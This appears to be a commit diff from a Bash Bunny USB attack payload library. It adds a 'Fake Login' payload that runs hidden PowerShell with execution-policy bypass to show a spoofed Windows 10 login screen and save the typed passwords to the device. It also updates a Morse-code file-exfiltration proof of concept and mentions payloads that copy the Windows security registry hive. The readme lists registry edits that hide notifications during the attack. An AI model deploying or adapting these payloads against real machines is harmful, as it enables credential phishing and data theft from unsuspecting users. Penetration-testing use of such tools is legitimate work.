Update PoSH_Morsecode, Add Windows 10 Login Screen (#430)

* Add files via upload

* Update readme.md

* Update payload.txt

* Update readme.md

* Update readme.md

* Update readme.md

* Update readme.md

* Update readme.md

* Add files via upload

* Update readme.md

* Update readme.md

* Add Payload WIN_PoSH_HKU_RegBackUp

* Update readme.md

* Update payload.txt

* Change for admin shell

* Update readme.md

* Update payload.txt

* Update payload.txt

* Update readme.md

* Added payload WIN_PoSH_SaveSecurityHive

Added new payload to exfiltration that saves the HKLM security hive to the bunny

* Morse Code File Exfiltration

A bit pointless with limitation of morse code but I thought it was fun to create.

* Update readme.md

* Update for non-alphanumeric

* Update for timing

* Update readme.md

* Update readme.md

* Update readme.md

* Update readme.md

* Update payload.txt

* New payload - Fake Login

Shows a fake version of the windows 10 login screen

* Update readme.md

* Changes to Fake Login Payload

* Changes to Fake Login

payloads/library/credentials/Win_PoSH_FakeLogin/payload.txt

@@ -0,0 +1,20 @@
+# Title:        Fake Login
+# Description:  Shows a fake login screen
+# Author:       Cribbit
+# Version:      1.0
+# Category:     Credentials
+# Target:       Windows (Powershell 5.1+)
+# Attackmodes:	HID & STORAGE 
+# Extensions:   Run
+
+LED SETUP
+
+GET SWITCH_POSITION
+
+ATTACKMODE HID STORAGE VID_0X05AC PID_0X021E
+
+LED ATTACK
+
+RUN WIN "powerShell -Noni -NoP -W h -EP Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\L.ps1')"
+
+LED FINNISH

payloads/library/credentials/Win_PoSH_FakeLogin/readme.md

@@ -0,0 +1,45 @@
+# Fake Login
+- Author: Cribbit
+- Version: 1.0
+- Target: Windows 10 (Powershell 5.1+)
+- Category: Credentials
+- Attackmode: HID & Storage
+- Extensions: Run
+- Props: PanicAcid for testing multi-screen desktops, Foxtrot and Other Hak5 Discord members
+
+## Change Log
+| Version | Changes         |
+| ------- | --------------- |
+| 1.0     | Initial release |
+
+## Description
+Shows a fake login screen. Saves the entered value to the loots folder on the bunny.
+
+## Config
+This payload contains 9 base64 encode images.
+If you do not wish to use them you could have the files on the bunny and do something like this:
+```powershell
+$BGImg = [System.Drawing.Image]::FromFile(<PathToBunny>"bg.jpg");
+```
+or if you have web hosting or a http server runing on the bunny then you can do something like:
+```powershell
+$R = Invoke-WebRequest 'https://<MyURL/IPAddress>/bg.jpg'; 
+$BGImg = [System.Drawing.Image]::FromStream($R.RawContentStream);
+```
+
+## To Do
+Adding a To Do section just in case someone (or me if I can be bothered) want to fix some issues:
+
+- Fade between Time panel 1 and login panel 2
+    - The beginnings of the code are there but has too much noticeable flicker.
+- Disable notifications as they display over the form:
+    - HKEY\_LOCAL\_MACHINE\\Software\\Policies\\Microsoft\\Windows\\Explorer, this Explorer needs to be created, Dword32 “DisableNotificationCenter”, value as 1.
+    - HKEY\_CURRENT\_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\PushNotifications, "ToastEnabled" DWORD 0 = Turn off
+    - HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Notifications\\Settings\\Windows.SystemToast.AutoPlay, "Enabled" = 0
+
+## Colours
+| Status | Colour                        | Description                 |
+| ------ | ----------------------------- | --------------------------- |
+| SETUP  | Magenta solid                 | Setting attack mode         |
+| ATTACK | Yellow single blink           | Injecting Powershell script |
+| FINISH | Green blink followed by SOLID | Script is finished          |

payloads/library/poc/WIN_PoSH_MorseCode/payload.txt

@@ -1,7 +1,7 @@
 # Title:        Morse Code File Exfiltration
-# Description:  Reads all txt file and Flashes the Scrolllock on and off to represent morse code  
+# Description:  Reads all txt files in myDocs and Flashes the Scrolllock on and off to represent morse code  
 # Author:       Cribbit
-# Version:      1.0
+# Version:      1.2
 # Category:     PoC
 # Target:       Windows (Powershell 5.1+)
 # Attackmodes:	HID & STORAGE

payloads/library/poc/WIN_PoSH_MorseCode/readme.md

@@ -1,6 +1,6 @@
 # Morse Code File Exfiltration
 * Author: Cribbit 
-* Version: 1.0
+* Version: 1.2
 * Target: Windows (Powershell 5.1+)
 * Category: PoC
 * Attackmode: HID & Storage
@@ -13,7 +13,7 @@
 | 1.2     | Update for space timing       |
 
 ## Description
-Reads all txt file in my documents and Flashes the Scrolllock on and off to represent Morse code of the engish alphanumeric characters (0..9 A..Z)
+Reads all txt files in "my documents" and Flashes the Scrolllock on and off to represent Morse code of the engish alphanumeric characters (0..9 A..Z)
 
 ## Update
 For characters out side the Morse code 0..9 A..Z it now flash one long pulse then the chars ordinal value ie (@ = 64 = -.... ....-)  
@@ -25,6 +25,9 @@ The payload uses a base64 encode version of the payload (b.txt) to get round the
 
 Please check the encoded payload before execution, to make sure it has not been replaced with something more malicious. 
 
+If you do not want to use the base64 version you could change the payload to:
+`RUN WIN "powerShell -Noni -NoP -W h -EP Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\MorseCodeFileExfiltration.ps1')"`
+
 ## Colors
 | Status    | Color                         | Description                                      |
 | --------- | ------------------------------| ------------------------------------------------ |